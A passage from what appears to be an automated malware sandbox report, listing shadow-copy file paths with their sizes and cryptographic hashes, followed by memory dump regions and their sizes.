      c98666fb86aaff6471c0a96f12f037b9a607579c5891c9d7ba8cd4e90506ca7aa5b5f6264081d25f703c88fb69d8e2cd87809d508e771770550d0c5d4d17d91c

    • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

      Filesize

      24.1MB

      MD5

      fec2bce9b8e48398208a647116bdf3d9

      SHA1

      262d947b0351fd37e43c60ede0b571241ed2f723

      SHA256

      1b95e088156fdd45897dbbd8c96c08cb90a94035de2feb2c22b6554c776dad0c

      SHA512

      e72a95da1fd2cfd83126c3a416efc2da666206952a8e2ccee57b3e8257c30dd494935862cf5a9027f68615e518b4c0e7913825fd4b821d3e3843b8eac37e6226

    • \??\Volume{1541411d-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{bbf1f15b-3906-43ca-9022-dc7933f48dc5}_OnDiskSnapshotProp

      Filesize

      6KB

      MD5

      c4aafa5da82f9f36ac7f5cb7e2bd07c9

      SHA1

      f5a533d45bcffe40a7d44a557febb6d91cbde4ce

      SHA256

      fb06910c7714679b7f0df176de31b7fdf1241d64d7be8807a3a6073a97141cc7

      SHA512

      a041f128c89f483d91dab6460b0124b64257816dde1d3e0a403080da10d47e18806dbaeebfd8150e43f0b70d000c448d54833a1f9159914293583932853a53b2

    • memory/1768-54-0x00000000097D0000-0x00000000097FF000-memory.dmp

      Filesize

      188KB

    • memory/2676-413-0x000000002A710000-0x000000002A75D000-memory.dmp

      Filesize

      308KB

    • memory/2676-414-0x000000002C340000-0x000000002C4FC000-memory.dmp

      Filesize

      1.7MB

    • memory/2676-416-0x000000002C340000-0x000000002C4FC000-memory.dmp

      Filesize

      1.7MB

    • memory/2676-417-0x000000002C340000-0x000000002C4FC000-memory.dmp

      Filesize

      1.7MB

    • memory/2676-418-0x000000002C340000-0x000000002C4FC000-memory.dmp

      Filesize

      1.7MB

    • memory/2904-60-0x0000000000810000-0x00000000008E6000-memory.dmp

      Filesize

      856KB

    • memory/5044-18-0x0000021333D00000-0x0000021333D22000-memory.dmp

      Filesize

      136KB